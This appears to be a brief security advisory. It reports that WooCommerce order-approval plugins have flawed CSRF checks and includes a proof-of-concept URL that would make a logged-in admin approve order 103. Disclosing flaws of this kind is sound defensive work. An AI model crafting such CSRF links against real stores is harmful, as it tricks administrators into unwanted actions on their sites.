The plugins have flawed CSRF checks in various places, which could allow attackers to make logged in users perform unwanted actions
[addify-order-approval-woocommerce] - To make a logged in admin approve the order with ID 103
https://example.com/wp-admin/edit.php?s=&post_status=all&post_type=shop_order&action=approved&m=0&_customer_user=&paged=1&post%5B%5D=103&action2=approved